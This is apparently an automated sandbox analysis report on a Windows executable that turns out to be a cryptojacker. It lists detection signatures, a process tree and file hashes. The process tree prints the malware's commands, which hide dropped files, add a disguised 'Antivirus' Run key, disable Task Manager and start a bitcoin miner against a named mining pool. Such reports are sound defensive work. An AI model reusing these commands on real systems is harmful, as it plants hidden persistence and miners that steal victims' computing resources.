Overview

overview

8

Static

static

3

bfe17800bf...18.exe

windows7-x64

8

bfe17800bf...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    25/08/2024, 01:43

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe

  • Size

    2.8MB

  • MD5

    bfe17800bf5f9d1c0e3e2f548c10441b

  • SHA1

    64791f65e1759bd0e4201d5e19e9a50e41ab83fa

  • SHA256

    f31b14069833b2ad38b746e4a32639b06fa06024129860da9f3c3c03a732a65e

  • SHA512

    35806a40f9929c04cd02fb90db5d503b77b317d40138f76d03f306cfda3bd09615f18d3da5d103a780ad53d0fa4cfd3f351b6e62144d95f379a32a0432e794fa

  • SSDEEP

    49152:9j+liOUidT2U0RDWKMRtTgpJQUxCC5AF:

Score
8/10
discoveryevasionpersistenceupx

Malware Config

Signatures

  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • Disables Task Manager via registry modification
    evasion
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\561C.tmp\test.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\SysWOW64\PING.EXE
          ping localhost -n 5
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2296
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h C:\Cache\run.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1228
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h C:\Cache\bitcoin-miner.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2472
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h C:\Cache\checker.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1352
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h C:\Cache
          4⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1116
        • C:\Windows\SysWOW64\reg.exe
          reg add hkey_current_user\software\microsoft\windows\currentversion\run /v Antivirus /t reg_sz /d "C:\Cache\checker.exe" /f
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:440
        • C:\Windows\SysWOW64\reg.exe
          reg add hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
          4⤵
          • Disables RegEdit via registry modification
          • System Location Discovery: System Language Discovery
          PID:1488
        • C:\Windows\SysWOW64\reg.exe
          reg add hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:648
        • C:\Cache\checker.exe
          checker.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1260
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\6E6C.tmp\checker.bat" "
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2668
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              6⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2188
            • C:\Windows\SysWOW64\find.exe
              FIND "bitcoin-miner.exe" result.txt
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2804
            • C:\Cache\run.exe
              C:\Cache\run.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2820
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\7427.tmp\run.bat" "
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2324
                • C:\Cache\bitcoin-miner.exe
                  bitcoin-miner.exe -a 5 -o http://pool.bitclockers.com:8332 -u s7eez -p kukuku -t 24
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:752
            • C:\Windows\SysWOW64\PING.EXE
              ping localhost -n 60
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2388
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              6⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1884
            • C:\Windows\SysWOW64\find.exe
              FIND "bitcoin-miner.exe" result.txt
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2460
            • C:\Windows\SysWOW64\PING.EXE
              ping localhost -n 60
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:1384
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              6⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1752
            • C:\Windows\SysWOW64\find.exe
              FIND "bitcoin-miner.exe" result.txt
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2700
            • C:\Windows\SysWOW64\PING.EXE
              ping localhost -n 60
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:848

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Cache\result.txt
          Filesize

          2KB

          MD5

          3cc95b3eddc329167833433281d3add8

          SHA1

          4ddd84630787f7188cbd378c7074031979ed3473

          SHA256

          1dfa36f76ba469bad7844909554dea9a38f08f249d1ab083c141823cdbcbf90c

          SHA512

          dbf01025decf1fce762ff5a54569701dfa7fa3087e3857e3ea5899f8789e26ff8f86dbbff0f927740b9a7173b09aeab778f18ddc8bdeef1e8ff7804b5990b24b

          Download Submit

        • C:\Cache\result.txt
          Filesize

          3KB

          MD5

          0c02efca61a7b62e3e45c0a9a3d0b70a

          SHA1

          52be63085e3dc72ae52071e6a37a7bcf440d10ca

          SHA256

          55e7b3e01c7b50a6c208da96135f2173107a2949a01a0a093d210d42499e82be

          SHA512

          1cf891cd54b53fc896613fc8a1582924c424856afb9c60367f38914a5e14c5ee6761612a80e6fcd93026185beb262f1804262c88a3dd4d1967ad1f107fd5b483

          Download Submit

        • C:\Cache\result.txt
          Filesize

          3KB

          MD5

          405e9df3234fc3ab6de98b2b1a9c38a0

          SHA1

          821a57effe2817080c2efdc61a97fa092414a8ed

          SHA256

          099150523d202a2da9a9e88afb0915b5a449be941b19ffdfed167f2869dc979c

          SHA512

          7f2191b6582741d59d98d155414eb752a0a101765e6e8dd33c298b79ee30d4e619bd4cb07f4ca21254b64f8a342df935e681dff82c55378adb9fd6794bb19a25

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\561C.tmp\test.bat
          Filesize

          659B

          MD5

          a159ff64bdd86119d3810c5c467b37c5

          SHA1

          5867c5f0e54451b45ef256b1ff6ed48fe7a6941d

          SHA256

          0c71339eea76e2ac439b5e590e009aee64ce086104eb3659b3466213cd4b6328

          SHA512

          a21b3518201652b27e1b0a61f374e339d3dc7482992d25fda94244fe3a9a3896f1bf19f4a64433a57ef2c72787ebcf604714660abfe8b41ad724302b4e445171

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\6E6C.tmp\checker.bat
          Filesize

          165B

          MD5

          59685a7437a42b58e0f15e5305dfe403

          SHA1

          ed7b81ddfe8b904bf1b69a4d07e0f99cbff92ae6

          SHA256

          b7e7c6009e776e3ed1c0bb80da8e14190b034c5bcd6ccee5aec7f68df8beaed2

          SHA512

          6b6a5e91ba342adbecff9ff1d570c0275700f60c348780ca28bd6362896f3a3021c44bc555367cdcb62212277b1898661dec9c3674cbd668826fc1aa91286e3d

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\7427.tmp\run.bat
          Filesize

          83B

          MD5

          172e76eea3bf6b1690e730de18c237ce

          SHA1

          1996dbcf5445d7758c8c32803cfa2184914067e4

          SHA256

          1cec973c8a11df697e35b0fce0006334a4bc6752edd51b908975027e5d353610

          SHA512

          fb0bf2690ec77b884da196d37d34e846e98b51973cdefd2e701febd412b35b8fa4e2d32e92ac8f23ccf4e1f9389373aa3c24aea5c48b0dc7af2c6c82aae66ab9

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\bitcoin-miner.exe
          Filesize

          672KB

          MD5

          5e73d3f4cde7c8c3d8ea87372edf5771

          SHA1

          95871d7fe75e3393bf7ea9428aa23f5725ebd895

          SHA256

          7867dd91375e3cb9b1bc1bb1602c3d9c77041d6c04ed66783399f6708192efec

          SHA512

          d783dc2d5b8cf6c49193ea3bd778c4556338748a9a981772eea42ae38fa592d897c539c84671073a81950fddd963d5bb0c1543381b4d2af035997e9d6b41ef5e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\checker.exe
          Filesize

          21KB

          MD5

          441deed66676ea3d1b91c76d364965bc

          SHA1

          1234f568d5bc3e3b7310487adf55467cebae74d8

          SHA256

          8a4d75e0803c3fb2a3f5e3371754b8fe01d398fd8db8712f03280cc4d27289ea

          SHA512

          ff60d74c23e41f2dbb5ecb21526a1e111d7e160b8083e88f124c8b325238394def49d1f95c90171a485343f51765b3a8879026955bd6f419d0088b7dd439f9e4

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\run.exe
          Filesize

          21KB

          MD5

          e36f9411cd577d2c4da6878781844f2c

          SHA1

          9a5568008416efe4cb91528a760491019216f386

          SHA256

          8bc058ca7adddc2f1b78ed605ebc218763688dfaf664983b7ed6801120ae98e0

          SHA512

          d52e0b5a2438e9b4f47facecd4e5235ad06d6c46d8812f11b30ae4575ed33e913336107807b3b01cf192507655c5f509391c86159de6b2b573592c2b17706ed0

          Download Submit

        • memory/1260-92-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1260-49-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2536-45-0x0000000000130000-0x0000000000140000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2536-48-0x0000000000130000-0x0000000000140000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2668-69-0x0000000000270000-0x0000000000280000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2668-71-0x0000000000270000-0x0000000000280000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2708-26-0x00000000740A0000-0x000000007464B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2708-0-0x00000000740A1000-0x00000000740A2000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2708-2-0x00000000740A0000-0x000000007464B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2708-1-0x00000000740A0000-0x000000007464B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2820-94-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2920-15-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/2920-65-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/2920-6-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/2920-7-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/2920-9-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2920-14-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/2920-16-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/2920-11-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/2920-13-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/2920-5-0x0000000000400000-0x0000000000545000-memory.dmp

          Filesize

          1.3MB

          Download